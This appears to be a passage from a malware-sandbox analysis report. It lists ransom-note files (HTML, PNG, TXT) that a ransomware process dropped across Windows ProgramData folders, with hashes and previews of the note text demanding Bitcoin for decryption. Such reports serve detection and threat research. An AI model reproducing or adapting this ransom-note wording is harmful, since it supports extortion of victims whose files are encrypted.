                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\MSScan\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\MSScan\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\MSScan\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows NT\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows NT\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows NT\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Security Health\Logs\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Security Health\Logs\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Security Health\Logs\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows Security Health\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows Security Health\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows Security Health\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\Caches\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):54992
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:768:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VSnk3VS+:ak3gnk3gnk3gnk3gnk3gnk3gnk3g+
                  MD5:28C08EE848FD5F14B8DBA817F17C9336
                  SHA1:B7FBA910C0A7EB9FDB4034E57D7D8FC63713B6BE
                  SHA-256:EDA172BB4D85EB62F5D6B2D53209FF20914DD2FB194FC3AFAE2DE02FA98A2ABA
                  SHA-512:630BDC87D1C56ADC27A649BE3F346C0C2B89981679D967B2B480A85497A26515C3CFDA0AFF3301BD97ED6110ECCD39CF442EB9A7BE1BEF174FCC065710FDD2D4
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\Caches\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):474264
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:12288:xrCifKrCifKrCifKrCifKrCifKrCifKrCifA:xrCiCrCiCrCiCrCiCrCiCrCiCrCio
                  MD5:9F7AA7DF2FF97FF4C39D0013E8BEC5EC
                  SHA1:AF430020BC11A057D0F53ECF4CBE1B4B3AE74E99
                  SHA-256:895B6D3FB59778B797A1B7356369BDB212F64D2A8A6AFE2F3A3DA591F61D6D46
                  SHA-512:4ECB4E9DA298380C9C00B63D5BE07AD7854AE2C2E0E2F679C9208FF12A492D1838A25EDE517F355FA4DCCDC504A578A4F2BD5FDABA6C67CAFB732890744962F4
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\Caches\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):14679
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:1DAD93A1FA0FF49DD69890F37658FFA6
                  SHA1:62AF9D0F4EC3B87B32F6F41968D1BC320A26D038
                  SHA-256:7EA693BB9567A525C46D4BF5922AF7C77E94E2019A3A105AFCDA6EB3D9033065
                  SHA-512:E2B5EFD5EA646265037F9057467EBB822009E91F2BCB097B17C1AFF25A09114B46E2737E6BC8C720853B56F44A364152FDC7DB35808B2008136E4509EEC3C62E
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\Apps\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
                  SHA1:E979DEAF02039B281A610353018D89440ACF8C6C
                  SHA-256:509A256004A45EE5A235854462E8E2FECC4C9B8B8D5CDA8FB260BCA59282FDB3
                  SHA-512:C36FED2F576DCDCB34802274F1B6A43B8DE01C2D4116446A38761D39FC1A0A2B182887CA322E96EF2E749F48DB6DACBB5146FF56DDA440E01B32521A42E02085
                  Malicious:false
                  Preview: .. __!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#!__!@#!@#! ....NOT YOUR LANGUAGE? USE https://translate.google.com ....What happened to your files ?..All of your files were protected by a strong encryption with RSA-4096...More information about the encryption keys using RSA-4096 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....How did this happen ?..!!! Specially for your PC was generated personal RSA-4096 KEY, both public and private...!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..So, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way...If You have really valuable data, you better not waste your time, because there is no
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\KeyHolder\help_recover_instructions+fnc.html
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):47136
                  Entropy (8bit):4.765622697942955
                  Encrypted:false
                  SSDEEP:384:az5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVSnz5mBbxfVS+:ak3VSnk3VSnk3VSnk3VSnk3VSnk3VS+
                  MD5:D07CCBE769EBEC1D8CAE6017EC1F6169
                  SHA1:CA2A02FA59BB9D8C83A291D0682C71F923F117CD
                  SHA-256:4C4DF07203027D038DE80EA251D9B840ED5616DF188FDD5951F3807D1CC39D8D
                  SHA-512:37705E78B8C0632084F0C61041DC613A5F8ABC34F3DE867D0F4694A86ABBC373187B5095B135ECD3317CFCFD18D7A6B78424DA7F3BD5DCDF5A47FC23AF5D2C7F
                  Malicious:false
                  Preview: <html>. 0000 --> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }..ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> 0000-0000 --> <center>..<div style="text-align:left; font-family:Arial; ----0000 --> font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;">.<b><font class="ttl"><center><b>NOT YOUR LANGUAGE? USE <a href="https://translate.google.com" target="_blank">Google Translate</a></b></center>.What ----0000 --> happened ----0000 --> to your ----0000 --> files?</b></font><br> <font style="font-size:13px;">All ----0000 -->of your files ----0000 --> were. ----0000 --> protected by a strong ----0000 --> encryption with ----0000 --> RSA ----0000 --> .<br> More ----0000 --> information about the ----0000 -->encryption RSA can b
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\KeyHolder\help_recover_instructions+fnc.png
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):406512
                  Entropy (8bit):7.7547107859973785
                  Encrypted:false
                  SSDEEP:6144:xrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4C7bDrYcoik4A:xrCifKrCifKrCifKrCifKrCifKrCifA
                  MD5:FC226523469253DE87A69B9BC142420B
                  SHA1:2B1F22D1A0A8428CC1A11ACFCB20894CA237F090
                  SHA-256:D9A1F01832BD9E2821C01EB6DD3BE4B7CD6D3610C2AD7ED8B801F1B4911CA7D5
                  SHA-512:623156984045EA37DE411392D73C641CADDF2C27DE250851A42778E13238AFF348E24CF089FFBBCA8EF66B808932B8AAD30587A1FCD2752FA7DFA6A64E7D39AA
                  Malicious:false
                  C:\ProgramData\Microsoft\Windows\ClipSVC\Archive\KeyHolder\help_recover_instructions+fnc.txt
                  Process:C:\Users\user\AppData\Roaming\mllvvvh.exe
                  File Type:Unknown
                  Category:dropped
                  Size (bytes):12582
                  Entropy (8bit):5.270137188183911
                  Encrypted:false
                  SSDEEP:192:E1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj6p1Itk5yj66:kIi5PIi5PIi5PIi5PIi5PIi5u
                  MD5:817D02692841B622ADC493D624983933
